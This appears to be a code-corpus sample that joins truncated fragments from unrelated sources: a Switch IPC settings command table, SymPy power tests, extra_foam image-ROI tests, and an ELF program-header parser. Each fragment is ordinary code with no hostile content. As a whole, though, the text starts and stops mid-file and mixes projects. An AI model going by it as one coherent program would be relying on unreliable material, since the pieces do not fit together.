('nn::settings::ISystemSettingsServer', 84, '0 bytes in - 0x18 bytes out - OutRaw<0x18,1,0>'),
('nn::settings::ISystemSettingsServer', 85, '0x18 bytes in - 0 bytes out - InRaw<0x18,1,0>'),
('nn::settings::ISystemSettingsServer', 86, '0 bytes in - 0x18 bytes out - OutRaw<0x18,4,0>'),
('nn::settings::ISystemSettingsServer', 87, '0x18 bytes in | |
<filename>sympy/core/tests/test_power.py
from sympy.core import (
Basic, Rational, Symbol, S, Float, Integer, Mul, Number, Pow,
Expr, I, nan, pi, symbols, oo, zoo, N)
from sympy.core.tests.test_evalf import NS
from sympy.core.function import expand_multinomial
from sympy.functions.elementary.miscellaneous import sqrt, cbrt
from sympy.functions.elementary.exponential import exp, log
from sympy.functions.special.error_functions import erf
from sympy.functions.elementary.trigonometric import (
sin, cos, tan, sec, csc, sinh, cosh, tanh, atan)
from sympy.polys import Poly
from sympy.series.order import O
from sympy.sets import FiniteSet
from sympy.core.expr import unchanged
from sympy.testing.pytest import warns_deprecated_sympy
def test_rational():
a = Rational(1, 5)
r = sqrt(5)/5
assert sqrt(a) == r
assert 2*sqrt(a) == 2*r
r = a*a**S.Half
assert a**Rational(3, 2) == r
assert 2*a**Rational(3, 2) == 2*r
r = a**5*a**Rational(2, 3)
assert a**Rational(17, 3) == r
assert 2 * a**Rational(17, 3) == 2*r
def test_large_rational():
e = (Rational(123712**12 - 1, 7) + Rational(1, 7))**Rational(1, 3)
assert e == 234232585392159195136 * (Rational(1, 7)**Rational(1, 3))
def test_negative_real():
def feq(a, b):
return abs(a - b) < 1E-10
assert feq(S.One / Float(-0.5), -Integer(2))
def test_expand():
x = Symbol('x')
assert (2**(-1 - x)).expand() == S.Half*2**(-x)
def test_issue_3449():
#test if powers are simplified correctly
#see also issue 3995
x = Symbol('x')
assert ((x**Rational(1, 3))**Rational(2)) == x**Rational(2, 3)
assert (
(x**Rational(3))**Rational(2, 5)) == (x**Rational(3))**Rational(2, 5)
a = Symbol('a', real=True)
b = Symbol('b', real=True)
assert (a**2)**b == (abs(a)**b)**2
assert sqrt(1/a) != 1/sqrt(a) # e.g. for a = -1
assert (a**3)**Rational(1, 3) != a
assert (x**a)**b != x**(a*b) # e.g. x = -1, a=2, b=1/2
assert (x**.5)**b == x**(.5*b)
assert (x**.5)**.5 == x**.25
assert (x**2.5)**.5 != x**1.25 # e.g. for x = 5*I
k = Symbol('k', integer=True)
m = Symbol('m', integer=True)
assert (x**k)**m == x**(k*m)
assert Number(5)**Rational(2, 3) == Number(25)**Rational(1, 3)
assert (x**.5)**2 == x**1.0
assert (x**2)**k == (x**k)**2 == x**(2*k)
a = Symbol('a', positive=True)
assert (a**3)**Rational(2, 5) == a**Rational(6, 5)
assert (a**2)**b == (a**b)**2
assert (a**Rational(2, 3))**x == a**(x*Rational(2, 3)) != (a**x)**Rational(2, 3)
def test_issue_3866():
assert --sqrt(sqrt(5) - 1) == sqrt(sqrt(5) - 1)
def test_negative_one():
x = Symbol('x', complex=True)
y = Symbol('y', complex=True)
assert 1/x**y == x**(-y)
def test_issue_4362():
neg = Symbol('neg', negative=True)
nonneg = Symbol('nonneg', nonnegative=True)
any = Symbol('any')
num, den = sqrt(1/neg).as_numer_denom()
assert num == sqrt(-1)
assert den == sqrt(-neg)
num, den = sqrt(1/nonneg).as_numer_denom()
assert num == 1
assert den == sqrt(nonneg)
num, den = sqrt(1/any).as_numer_denom()
assert num == sqrt(1/any)
assert den == 1
def eqn(num, den, pow):
return (num/den)**pow
npos = 1
nneg = -1
dpos = 2 - sqrt(3)
dneg = 1 - sqrt(3)
assert dpos > 0 and dneg < 0 and npos > 0 and nneg < 0
# pos or neg integer
eq = eqn(npos, dpos, 2)
assert eq.is_Pow and eq.as_numer_denom() == (1, dpos**2)
eq = eqn(npos, dneg, 2)
assert eq.is_Pow and eq.as_numer_denom() == (1, dneg**2)
eq = eqn(nneg, dpos, 2)
assert eq.is_Pow and eq.as_numer_denom() == (1, dpos**2)
eq = eqn(nneg, dneg, 2)
assert eq.is_Pow and eq.as_numer_denom() == (1, dneg**2)
eq = eqn(npos, dpos, -2)
assert eq.is_Pow and eq.as_numer_denom() == (dpos**2, 1)
eq = eqn(npos, dneg, -2)
assert eq.is_Pow and eq.as_numer_denom() == (dneg**2, 1)
eq = eqn(nneg, dpos, -2)
assert eq.is_Pow and eq.as_numer_denom() == (dpos**2, 1)
eq = eqn(nneg, dneg, -2)
assert eq.is_Pow and eq.as_numer_denom() == (dneg**2, 1)
# pos or neg rational
pow = S.Half
eq = eqn(npos, dpos, pow)
assert eq.is_Pow and eq.as_numer_denom() == (npos**pow, dpos**pow)
eq = eqn(npos, dneg, pow)
assert eq.is_Pow is False and eq.as_numer_denom() == ((-npos)**pow, (-dneg)**pow)
eq = eqn(nneg, dpos, pow)
assert not eq.is_Pow or eq.as_numer_denom() == (nneg**pow, dpos**pow)
eq = eqn(nneg, dneg, pow)
assert eq.is_Pow and eq.as_numer_denom() == ((-nneg)**pow, (-dneg)**pow)
eq = eqn(npos, dpos, -pow)
assert eq.is_Pow and eq.as_numer_denom() == (dpos**pow, npos**pow)
eq = eqn(npos, dneg, -pow)
assert eq.is_Pow is False and eq.as_numer_denom() == (-(-npos)**pow*(-dneg)**pow, npos)
eq = eqn(nneg, dpos, -pow)
assert not eq.is_Pow or eq.as_numer_denom() == (dpos**pow, nneg**pow)
eq = eqn(nneg, dneg, -pow)
assert eq.is_Pow and eq.as_numer_denom() == ((-dneg)**pow, (-nneg)**pow)
# unknown exponent
pow = 2*any
eq = eqn(npos, dpos, pow)
assert eq.is_Pow and eq.as_numer_denom() == (npos**pow, dpos**pow)
eq = eqn(npos, dneg, pow)
assert eq.is_Pow and eq.as_numer_denom() == ((-npos)**pow, (-dneg)**pow)
eq = eqn(nneg, dpos, pow)
assert eq.is_Pow and eq.as_numer_denom() == (nneg**pow, dpos**pow)
eq = eqn(nneg, dneg, pow)
assert eq.is_Pow and eq.as_numer_denom() == ((-nneg)**pow, (-dneg)**pow)
eq = eqn(npos, dpos, -pow)
assert eq.as_numer_denom() == (dpos**pow, npos**pow)
eq = eqn(npos, dneg, -pow)
assert eq.is_Pow and eq.as_numer_denom() == ((-dneg)**pow, (-npos)**pow)
eq = eqn(nneg, dpos, -pow)
assert eq.is_Pow and eq.as_numer_denom() == (dpos**pow, nneg**pow)
eq = eqn(nneg, dneg, -pow)
assert eq.is_Pow and eq.as_numer_denom() == ((-dneg)**pow, (-nneg)**pow)
x = Symbol('x')
y = Symbol('y')
assert ((1/(1 + x/3))**(-S.One)).as_numer_denom() == (3 + x, 3)
notp = Symbol('notp', positive=False) # not positive does not imply real
b = ((1 + x/notp)**-2)
assert (b**(-y)).as_numer_denom() == (1, b**y)
assert (b**(-S.One)).as_numer_denom() == ((notp + x)**2, notp**2)
nonp = Symbol('nonp', nonpositive=True)
assert (((1 + x/nonp)**-2)**(-S.One)).as_numer_denom() == ((-nonp -
x)**2, nonp**2)
n = Symbol('n', negative=True)
assert (x**n).as_numer_denom() == (1, x**-n)
assert sqrt(1/n).as_numer_denom() == (S.ImaginaryUnit, sqrt(-n))
n = Symbol('0 or neg', nonpositive=True)
# if x and n are split up without negating each term and n is negative
# then the answer might be wrong; if n is 0 it won't matter since
# 1/oo and 1/zoo are both zero as is sqrt(0)/sqrt(-x) unless x is also
# zero (in which case the negative sign doesn't matter):
# 1/sqrt(1/-1) = -I but sqrt(-1)/sqrt(1) = I
assert (1/sqrt(x/n)).as_numer_denom() == (sqrt(-n), sqrt(-x))
c = Symbol('c', complex=True)
e = sqrt(1/c)
assert e.as_numer_denom() == (e, 1)
i = Symbol('i', integer=True)
assert ((1 + x/y)**i).as_numer_denom() == ((x + y)**i, y**i)
def test_Pow_Expr_args():
x = Symbol('x')
bases = [Basic(), Poly(x, x), FiniteSet(x)]
for base in bases:
with warns_deprecated_sympy():
Pow(base, S.One)
def test_Pow_signs():
"""Cf. issues 4595 and 5250"""
x = Symbol('x')
y = Symbol('y')
n = Symbol('n', even=True)
assert (3 - y)**2 != (y - 3)**2
assert (3 - y)**n != (y - 3)**n
assert (-3 + y - x)**2 != (3 - y + x)**2
assert (y - 3)**3 != -(3 - y)**3
def test_power_with_noncommutative_mul_as_base():
x = Symbol('x', commutative=False)
y = Symbol('y', commutative=False)
assert not (x*y)**3 == x**3*y**3
assert (2*x*y)**3 == 8*(x*y)**3
def test_power_rewrite_exp():
assert (I**I).rewrite(exp) == exp(-pi/2)
expr = (2 + 3*I)**(4 + 5*I)
assert expr.rewrite(exp) == exp((4 + 5*I)*(log(sqrt(13)) + I*atan(Rational(3, 2))))
assert expr.rewrite(exp).expand() == \
169*exp(5*I*log(13)/2)*exp(4*I*atan(Rational(3, 2)))*exp(-5*atan(Rational(3, 2)))
assert ((6 + 7*I)**5).rewrite(exp) == 7225*sqrt(85)*exp(5*I*atan(Rational(7, 6)))
expr = 5**(6 + 7*I)
assert expr.rewrite(exp) == exp((6 + 7*I)*log(5))
assert expr.rewrite(exp).expand() == 15625*exp(7*I*log(5))
assert Pow(123, 789, evaluate=False).rewrite(exp) == 123**789
assert (1**I).rewrite(exp) == 1**I
assert (0**I).rewrite(exp) == 0**I
expr = (-2)**(2 + 5*I)
assert expr.rewrite(exp) == exp((2 + 5*I)*(log(2) + I*pi))
assert expr.rewrite(exp).expand() == 4*exp(-5*pi)*exp(5*I*log(2))
assert ((-2)**S(-5)).rewrite(exp) == (-2)**S(-5)
x, y = symbols('x y')
assert (x**y).rewrite(exp) == exp(y*log(x))
assert (7**x).rewrite(exp) == exp(x*log(7), evaluate=False)
assert ((2 + 3*I)**x).rewrite(exp) == exp(x*(log(sqrt(13)) + I*atan(Rational(3, 2))))
assert (y**(5 + 6*I)).rewrite(exp) == exp(log(y)*(5 + 6*I))
assert all((1/func(x)).rewrite(exp) == 1/(func(x).rewrite(exp)) for func in
(sin, cos, tan, sec, csc, sinh, cosh, tanh))
def test_zero():
x = Symbol('x')
y = Symbol('y')
assert 0**x != 0
assert 0**(2*x) == 0**x
assert 0**(1.0*x) == 0**x
assert 0**(2.0*x) == 0**x
assert (0**(2 - x)).as_base_exp() == (0, 2 - x)
assert 0**(x - 2) != S.Infinity**(2 - x)
assert 0**(2*x*y) == 0**(x*y)
assert 0**(-2*x*y) == S.ComplexInfinity**(x*y)
def test_pow_as_base_exp():
x = Symbol('x')
assert (S.Infinity**(2 - x)).as_base_exp() == (S.Infinity, 2 - x)
assert (S.Infinity**(x - 2)).as_base_exp() == (S.Infinity, x - 2)
p = S.Half**x
assert p.base, p.exp == p.as_base_exp() == (S(2), -x)
# issue 8344:
assert Pow(1, 2, evaluate=False).as_base_exp() == (S.One, S(2))
def test_nseries():
x = Symbol('x')
assert sqrt(I*x - 1)._eval_nseries(x, 4, None, 1) == I + x/2 + I*x**2/8 - x**3/16 + O(x**4)
assert sqrt(I*x - 1)._eval_nseries(x, 4, None, -1) == -I - x/2 - I*x**2/8 + x**3/16 + O(x**4)
assert cbrt(I*x - 1)._eval_nseries(x, 4, None, 1) == (-1)**(S(1)/3) - (-1)**(S(5)/6)*x/3 + \
(-1)**(S(1)/3)*x**2/9 + 5*(-1)**(S(5)/6)*x**3/81 + O(x**4)
assert cbrt(I*x - 1)._eval_nseries(x, 4, None, -1) == (-1)**(S(1)/3)*exp(-2*I*pi/3) - \
(-1)**(S(5)/6)*x*exp(-2*I*pi/3)/3 + (-1)**(S(1)/3)*x**2*exp(-2*I*pi/3)/9 + \
5*(-1)**(S(5)/6)*x**3*exp(-2*I*pi/3)/81 + O(x**4)
assert (1 / (exp(-1/x) + 1/x))._eval_nseries(x, 2, None) == -x**2*exp(-1/x) + x
def test_issue_6100_12942_4473():
x = Symbol('x')
y = Symbol('y')
| |
<filename>extra_foam/pipeline/processors/tests/test_image_roi.py
"""
Distributed under the terms of the BSD 3-Clause License.
The full license is in the file LICENSE, distributed with this software.
Author: <NAME> <<EMAIL>>
Copyright (C) European X-Ray Free-Electron Laser Facility GmbH.
All rights reserved.
"""
import random
from unittest.mock import MagicMock, patch, PropertyMock
import pytest
import numpy as np
from extra_foam.pipeline.exceptions import ProcessingError
from extra_foam.pipeline.processors import ImageRoiTrain, ImageRoiPulse
from extra_foam.config import AnalysisType, config, Normalizer, RoiCombo, RoiFom, RoiProjType
from extra_foam.pipeline.tests import _TestDataMixin
# here we use numpy functions to calculate the ground truth
def _normalized_nanstd(*args, **kwargs):
return np.nanstd(*args, **kwargs) / np.nanmean(*args, **kwargs)
def _normalized_nanvar(*args, **kwargs):
return np.nanvar(*args, **kwargs) / np.nanmean(*args, **kwargs) ** 2
_roi_fom_handlers = {
RoiFom.SUM: np.nansum,
RoiFom.MEAN: np.nanmean,
RoiFom.MEDIAN: np.nanmedian,
RoiFom.MAX: np.nanmax,
RoiFom.MIN: np.nanmin,
RoiFom.STD: np.nanstd,
RoiFom.VAR: np.nanvar,
RoiFom.N_STD: _normalized_nanstd,
RoiFom.N_VAR: _normalized_nanvar
}
_roi_proj_handlers = {
RoiProjType.SUM: np.nansum,
RoiProjType.MEAN: np.nanmean
}
class TestImageRoiPulse(_TestDataMixin):
@pytest.fixture(autouse=True)
def setUp(self):
with patch.dict(config._data, {"PULSE_RESOLVED": True}):
proc = ImageRoiPulse()
proc._geom1 = [0, 1, 2, 3]
proc._geom2 = [1, 0, 2, 3]
proc._geom3 = [1, 2, 2, 3]
proc._geom4 = [3, 2, 3, 4]
self._proc = proc
def _get_data(self, poi_indices=None):
if poi_indices is None:
poi_indices = [0, 0]
return self.data_with_assembled(1001, (4, 20, 20), gen='range', poi_indices=poi_indices)
def _get_roi_slice(self, geom):
# get a tuple of slice object which can be used to slice ROI
return slice(geom[1], geom[1] + geom[3]), slice(geom[0], geom[0] + geom[2])
def testRoiGeom(self):
proc = self._proc
data, processed = self._get_data()
with patch.object(proc._meta, 'has_analysis', side_effect=lambda x: True):
proc.process(data)
roi = processed.roi
assert list(roi.geom1.geometry) == proc._geom1
assert list(roi.geom2.geometry) == proc._geom2
assert list(roi.geom3.geometry) == proc._geom3
assert list(roi.geom4.geometry) == proc._geom4
@pytest.mark.parametrize("norm_type, fom_handler",
[(k, v) for k, v in _roi_fom_handlers.items()])
def testRoiNorm(self, norm_type, fom_handler):
proc = self._proc
with patch.object(proc._meta, 'has_analysis',
side_effect=lambda x: True if x == AnalysisType.ROI_NORM_PULSE else False):
for combo, geom in zip([RoiCombo.ROI3, RoiCombo.ROI4], ['_geom3', '_geom4']):
data, processed = self._get_data()
proc._norm_combo = combo
proc._norm_type = norm_type
proc.process(data)
s = self._get_roi_slice(getattr(proc, geom))
fom_gt = fom_handler(data['assembled']['sliced'][:, s[0], s[1]], axis=(-2, -1))
np.testing.assert_array_almost_equal_nulp(fom_gt, processed.pulse.roi.norm)
for norm_combo in [RoiCombo.ROI3_SUB_ROI4, RoiCombo.ROI3_ADD_ROI4]:
data, processed = self._get_data()
proc._norm_combo = norm_combo
proc._norm_type = norm_type
proc.process(data)
s3 = self._get_roi_slice(proc._geom3)
fom3_gt = fom_handler(data['assembled']['sliced'][:, s3[0], s3[1]], axis=(-2, -1))
s4 = self._get_roi_slice(proc._geom4)
fom4_gt = fom_handler(data['assembled']['sliced'][:, s4[0], s4[1]], axis=(-2, -1))
if norm_combo == RoiCombo.ROI3_SUB_ROI4:
np.testing.assert_array_almost_equal(fom3_gt - fom4_gt, processed.pulse.roi.norm, decimal=4)
else:
np.testing.assert_array_almost_equal(fom3_gt + fom4_gt, processed.pulse.roi.norm, decimal=4)
with patch.object(proc._meta, 'has_analysis', side_effect=lambda x: False):
data, processed = self._get_data()
proc.process(data)
assert processed.pulse.roi.norm is None
@pytest.mark.parametrize("fom_type, fom_handler",
[(k, v) for k, v in _roi_fom_handlers.items()])
def testRoiFom(self, fom_type, fom_handler):
proc = self._proc
proc._fom_norm = Normalizer.UNDEFINED
proc._fom_type = fom_type
with patch.object(proc._meta, 'has_analysis',
side_effect=lambda x: True if x == AnalysisType.ROI_FOM_PULSE else False):
for combo, geom in zip([RoiCombo.ROI1, RoiCombo.ROI2], ['_geom1', '_geom2']):
data, processed = self._get_data()
proc._fom_combo = combo
proc.process(data)
s = self._get_roi_slice(getattr(proc, geom))
fom_gt = fom_handler(data['assembled']['sliced'][:, s[0], s[1]], axis=(-1, -2))
np.testing.assert_array_almost_equal(fom_gt, processed.pulse.roi.fom, decimal=4)
for combo in [RoiCombo.ROI1_SUB_ROI2, RoiCombo.ROI1_ADD_ROI2, RoiCombo.ROI1_DIV_ROI2]:
data, processed = self._get_data()
proc._fom_combo = combo
proc.process(data)
s1 = self._get_roi_slice(proc._geom1)
fom1_gt = fom_handler(data['assembled']['sliced'][:, s1[0], s1[1]], axis=(-1, -2))
s2 = self._get_roi_slice(proc._geom2)
fom2_gt = fom_handler(data['assembled']['sliced'][:, s2[0], s2[1]], axis=(-1, -2))
if combo == RoiCombo.ROI1_SUB_ROI2:
np.testing.assert_array_almost_equal(
fom1_gt - fom2_gt, processed.pulse.roi.fom, decimal=4)
elif combo == RoiCombo.ROI1_ADD_ROI2:
np.testing.assert_array_almost_equal(
fom1_gt + fom2_gt, processed.pulse.roi.fom, decimal=4)
else:
np.testing.assert_array_almost_equal(
fom1_gt / fom2_gt, processed.pulse.roi.fom, decimal=4)
if combo == RoiCombo.ROI1_DIV_ROI2:
with np.warnings.catch_warnings():
np.warnings.simplefilter("ignore", category=RuntimeWarning)
# test some of ROI2 FOM are nan
data, processed = self._get_data()
data['assembled']['sliced'][:2, :, :] = np.nan
proc.process(data)
s1 = self._get_roi_slice(proc._geom1)
fom1_gt = fom_handler(data['assembled']['sliced'][:, s1[0], s1[1]], axis=(-1, -2))
s2 = self._get_roi_slice(proc._geom2)
fom2_gt = fom_handler(data['assembled']['sliced'][:, s2[0], s2[1]], axis=(-1, -2))
assert np.count_nonzero(~np.isnan(fom1_gt / fom2_gt)) > 0
np.testing.assert_array_almost_equal(
fom1_gt / fom2_gt, processed.pulse.roi.fom, decimal=4)
# test all of ROI2 FOM are nan
data, processed = self._get_data()
processed.image.image_mask[s2[0], s2[1]] = True
proc.process(data)
if fom_type == RoiFom.SUM:
assert np.count_nonzero(~np.isinf(processed.pulse.roi.fom)) == 0
else:
assert np.count_nonzero(~np.isnan(processed.pulse.roi.fom)) == 0
with patch.object(proc._meta, 'has_analysis', side_effect=lambda x: False):
data, processed = self._get_data()
proc.process(data)
assert processed.pulse.roi.fom is None
def testRoiHist(self):
proc = self._proc
mocked_return = 1, 1, 1, 1, 1
with patch.object(proc._meta, 'has_analysis', side_effect=lambda x: True):
with patch("extra_foam.pipeline.processors.image_roi.nanhist_with_stats",
return_value=mocked_return) as hist_with_stats:
for combo, geom in zip([RoiCombo.ROI1, RoiCombo.ROI2],
['_geom1', '_geom2']):
data, processed = self._get_data(poi_indices=[0, 2])
proc._hist_combo = combo
proc._hist_n_bins = 10
proc.process(data)
s = self._get_roi_slice(getattr(proc, geom))
hist_with_stats.assert_called()
# ROI of the second POI
roi_gt = data['assembled']['sliced'][2, s[0], s[1]]
np.testing.assert_array_equal(roi_gt, hist_with_stats.call_args[0][0])
hist_with_stats.reset_mock()
hist = processed.pulse.roi.hist
with pytest.raises(KeyError):
hist[1]
with pytest.raises(KeyError):
hist[3]
for fom_combo in [RoiCombo.ROI1_SUB_ROI2, RoiCombo.ROI1_ADD_ROI2]:
data, processed = self._get_data(poi_indices=[1, 2])
proc._hist_combo = fom_combo
proc._hist_n_bins = 20
proc.process(data)
s1 = self._get_roi_slice(proc._geom1)
# ROI of the second POI
roi1_gt = data['assembled']['sliced'][2, s1[0], s1[1]]
s2 = self._get_roi_slice(proc._geom2)
roi2_gt = data['assembled']['sliced'][2, s2[0], s2[1]]
hist_with_stats.assert_called()
if fom_combo == RoiCombo.ROI1_SUB_ROI2:
np.testing.assert_array_equal(roi1_gt - roi2_gt,
hist_with_stats.call_args[0][0])
else:
np.testing.assert_array_equal(roi1_gt + roi2_gt,
hist_with_stats.call_args[0][0])
hist_with_stats.reset_mock()
hist = processed.pulse.roi.hist
with pytest.raises(KeyError):
hist[0]
with pytest.raises(KeyError):
hist[3]
with patch('extra_foam.ipc.ProcessLogger.error') as error:
proc._geom2 = [1, 0, 1, 3]
proc.process(data)
error.assert_called_once()
def testOnTrainResolvedDetector(self):
proc = self._proc
proc._pulse_resolved = False
proc._process_fom = MagicMock()
proc._process_norm = MagicMock()
proc._process_hist = MagicMock()
data, processed = self._get_data()
proc.process(data)
proc._process_fom.assert_not_called()
proc._process_norm.assert_not_called()
proc._process_hist.assert_not_called()
class TestImageRoiTrain(_TestDataMixin):
@pytest.fixture(autouse=True)
def setUp(self):
proc = ImageRoiTrain()
proc._set_ma_window(1)
proc._auc_range = (0, 1000)
proc._fom_integ_range = (0, 1000)
proc._meta.has_analysis = MagicMock(return_value=False)
proc._meta.has_any_analysis = MagicMock(return_value=False)
self._proc = proc
def _get_data(self):
shape = (20, 20)
data, processed = self.data_with_assembled(1001, shape, gen='range')
proc = ImageRoiPulse()
proc._geom1 = [0, 1, 2, 3]
# In order to pass the test, ROI1 and ROI2 cannot have overlap.
proc._geom2 = [5, 6, 2, 3]
proc._geom3 = [1, 2, 2, 3]
proc._geom4 = [3, 2, 3, 4]
# set processed.roi.geom{1, 2, 3, 4}
proc._process_hist = MagicMock() # it does not affect train-resolved analysis
proc.process(data)
processed.pp.image_on = 100 * np.random.randn(*shape).astype(np.float32) + 1.
processed.pp.image_off = 100 * np.random.randn(*shape).astype(np.float32)
return data, processed
def _get_roi_slice(self, geom):
return slice(geom[1], geom[1] + geom[3]), slice(geom[0], geom[0] + geom[2])
@patch('extra_foam.ipc.ProcessLogger.error')
def testNormalizationError(self, error):
def side_effect(*args, **kwargs):
raise ProcessingError
proc = self._proc
with patch.object(proc, "_normalize_fom", side_effect=side_effect):
# let "_process_fom" raise
with patch.object(proc, "_process_proj") as mocked_p_proj:
data, processed = self._get_data()
proc.process(data)
mocked_p_proj.assert_called_once()
with patch.object(proc, "_process_fom"):
# let "_process_proj" raise
with patch.object(proc, "_normalize_fom", side_effect=side_effect):
with patch.object(proc, "_process_norm_pump_probe") as mocked_p_norm_pp:
data, processed = self._get_data()
processed.pp.analysis_type = AnalysisType.ROI_PROJ
proc.process(data)
mocked_p_norm_pp.assert_called_once()
@pytest.mark.parametrize("norm_type, fom_handler",
[(k, v) for k, v in _roi_fom_handlers.items()])
def testRoiNorm(self, norm_type, fom_handler):
proc = self._proc
for combo, geom in zip([RoiCombo.ROI3, RoiCombo.ROI4], ['geom3', 'geom4']):
data, processed = self._get_data()
proc._norm_combo = combo
proc._norm_type = norm_type
proc.process(data)
s = self._get_roi_slice(getattr(processed.roi, geom).geometry)
assert fom_handler(processed.image.masked_mean[s[0], s[1]]) == \
pytest.approx(processed.roi.norm)
for norm_combo in [RoiCombo.ROI3_SUB_ROI4, RoiCombo.ROI3_ADD_ROI4]:
data, processed = self._get_data()
proc._norm_combo = norm_combo
proc._norm_type = norm_type
proc.process(data)
s3 = self._get_roi_slice(processed.roi.geom3.geometry)
fom3_gt = fom_handler(processed.image.masked_mean[s3[0], s3[1]])
s4 = self._get_roi_slice(processed.roi.geom4.geometry)
fom4_gt = fom_handler(processed.image.masked_mean[s4[0], s4[1]])
if norm_combo == RoiCombo.ROI3_SUB_ROI4:
assert fom3_gt - fom4_gt == pytest.approx(processed.roi.norm, rel=1e-3)
else:
assert fom3_gt + fom4_gt == pytest.approx(processed.roi.norm, rel=1e-4)
@pytest.mark.parametrize("fom_type, fom_handler",
[(k, v) for k, v in _roi_fom_handlers.items()])
@pytest.mark.parametrize("normalizer, norm", [(Normalizer.UNDEFINED, 1),
(Normalizer.ROI, 2.),
(Normalizer.XGM, 4.),
(Normalizer.DIGITIZER, 8.)])
def testRoiFom(self, fom_type, fom_handler, normalizer, norm):
def mocked_process_norm(p_data):
if normalizer == Normalizer.ROI:
p_data.roi.norm = 2.0
elif normalizer == Normalizer.XGM:
p_data.pulse.xgm.intensity = np.array([4., 4., 4., 4.]) # mean = 4.0
elif normalizer == Normalizer.DIGITIZER:
p_data.pulse.digitizer.ch_normalizer = 'A'
p_data.pulse.digitizer['A'].pulse_integral = np.array([8., 8., 8., 8.]) # mean = 8.0
proc = self._proc
proc._fom_type = fom_type
proc._fom_norm = normalizer
# We do not test all the combinations of parameters.
with patch.object(proc, "_process_norm", side_effect=mocked_process_norm):
for combo, geom in zip([RoiCombo.ROI1, RoiCombo.ROI2], ['geom1', 'geom2']):
data, processed = self._get_data()
proc._fom_combo = combo
proc.process(data)
s = self._get_roi_slice(getattr(processed.roi, geom).geometry)
assert fom_handler(processed.image.masked_mean[s[0], s[1]])/norm == \
pytest.approx(processed.roi.fom, rel=1e-4)
for fom_combo in [RoiCombo.ROI1_SUB_ROI2, RoiCombo.ROI1_ADD_ROI2, RoiCombo.ROI1_DIV_ROI2]:
data, processed = self._get_data()
proc._fom_combo = fom_combo
proc.process(data)
s1 = self._get_roi_slice(processed.roi.geom1.geometry)
fom1_gt = fom_handler(processed.image.masked_mean[s1[0], s1[1]])
s2 = self._get_roi_slice(processed.roi.geom2.geometry)
fom2_gt = fom_handler(processed.image.masked_mean[s2[0], s2[1]])
if fom_combo == RoiCombo.ROI1_SUB_ROI2:
assert (fom1_gt - fom2_gt) / norm == pytest.approx(processed.roi.fom)
elif fom_combo == RoiCombo.ROI1_ADD_ROI2:
assert (fom1_gt + fom2_gt) / norm == pytest.approx(processed.roi.fom)
else:
assert (fom1_gt / fom2_gt) / norm == pytest.approx(processed.roi.fom)
if fom_combo == RoiCombo.ROI1_DIV_ROI2:
with np.warnings.catch_warnings():
np.warnings.simplefilter("ignore", category=RuntimeWarning)
# test ROI1 FOM is a number and ROI2 FOM equals to 0, which produces inf
# However, inf/inf produces nan
s2 = self._get_roi_slice(processed.roi.geom2.geometry)
processed.image.masked_mean[s2[0], s2[1]] = 0
proc.process(data)
if fom_type in (RoiFom.N_STD, RoiFom.N_VAR):
assert np.isnan(processed.roi.fom)
else:
assert np.isinf(processed.roi.fom)
# both ROI1 FOM and ROI2 FOM are nan
data, processed = self._get_data()
processed.image.masked_mean[:] = np.nan
proc.process(data)
assert np.isnan(processed.roi.fom)
def testRoiHist(self):
proc = self._proc
mocked_return = 1, 1, 1, 1, 1
| |
terminated (nEnd == -1)
nEnd = max(nStart, nEnd)
self.sections[i].sectionName = bytes(stringtable_str[nStart:nEnd])
###############################################
# parse program header table
'''
typedef struct {
uint32_t p_type;
Elf32_Off p_offset;
Elf32_Addr p_vaddr;
Elf32_Addr p_paddr;
uint32_t p_filesz;
uint32_t p_memsz;
uint32_t p_flags;
uint32_t p_align;
} Elf32_Phdr;
typedef struct {
uint32_t p_type;
uint32_t p_flags;
Elf64_Off p_offset;
Elf64_Addr p_vaddr;
Elf64_Addr p_paddr;
uint64_t p_filesz;
uint64_t p_memsz;
uint64_t p_align;
} Elf64_Phdr;
The main difference lies in the location of p_flags within the struct.
'''
# create a list of the program_header_table
self.segments = list()
for i in range(self.header.e_phnum):
'''
uint32_t p_type;
This member of the Phdr struct tells what kind of segment
this array element describes or how to interpret the array
element's information.
(uint32_t p_flags; (Elf64_Phdr only, see below))
ElfN_Off p_offset; (N = 32/64)
This member holds the offset from the beginning of the
file at which the first byte of the segment resides.
ElfN_Addr p_vaddr; (N = 32/64)
This member holds the virtual address at which the first
byte of the segment resides in memory.
ElfN_Addr p_paddr; (N = 32/64)
On systems for which physical addressing is relevant, this
member is reserved for the segment's physical address.
Under BSD this member is not used and must be zero.
uintN_t p_filesz; (N = 32/64)
This member holds the number of bytes in the file image of
the segment. It may be zero.
uintN_t p_memsz; (N = 32/64)
This member holds the number of bytes in the memory image
of the segment. It may be zero.
uint32_t p_flags; (Elf32_Phdr only, for 64 see above)
This member holds a bitmask of flags relevant to the segment:
PF_X An executable segment.
PF_W A writable segment.
PF_R A readable segment.
A text segment commonly has the flags PF_X and PF_R.
A data segment commonly has PF_X, PF_W and PF_R.
uintN_t p_align; (N = 32/64)
This member holds the value to which the segments are aligned
in memory and in the file. Loadable process segments
must have congruent values for p_vaddr and p_offset, modulo
the page size. Values of zero and one mean no alignment is
required. Otherwise, p_align should be a positive, integral
power of two, and p_vaddr should equal p_offset, modulo
p_align.
'''
tempSegment = Segment()
tempOffset = self.header.e_phoff + i*self.header.e_phentsize
if self.bits == 32:
unpackedSegment = struct.unpack('< I 5I I I', \
buffer_list[tempOffset:tempOffset+32])
elif self.bits == 64:
unpackedSegment = struct.unpack('< I I 5Q Q', \
buffer_list[tempOffset:tempOffset+56])
# order elements as in Elf32_Phdr
unpackedSegment = unpackedSegment[0:1] + unpackedSegment[2:7] \
+ unpackedSegment[1:2] + unpackedSegment[7:8]
del tempOffset
(
tempSegment.elfN_Phdr.p_type,
tempSegment.elfN_Phdr.p_offset, # 32/64 bit!
tempSegment.elfN_Phdr.p_vaddr, # 32/64 bit!
tempSegment.elfN_Phdr.p_paddr, # 32/64 bit!
tempSegment.elfN_Phdr.p_filesz, # 32/64 bit!
tempSegment.elfN_Phdr.p_memsz, # 32/64 bit!
tempSegment.elfN_Phdr.p_flags, # position as in Elf32_Phdr
tempSegment.elfN_Phdr.p_align, # 32/64 bit!
) = unpackedSegment
# check which sections are in the current segment
# (in memory) and add them
for section in self.sections:
segStart = tempSegment.elfN_Phdr.p_vaddr
segEnd = segStart + tempSegment.elfN_Phdr.p_memsz
sectionStart = section.elfN_shdr.sh_addr
sectionEnd = sectionStart + section.elfN_shdr.sh_size
if segStart <= sectionStart and sectionEnd <= segEnd:
tempSegment.sectionsWithin.append(section)
self.segments.append(tempSegment)
# get all segments within a segment
for outerSegment in self.segments:
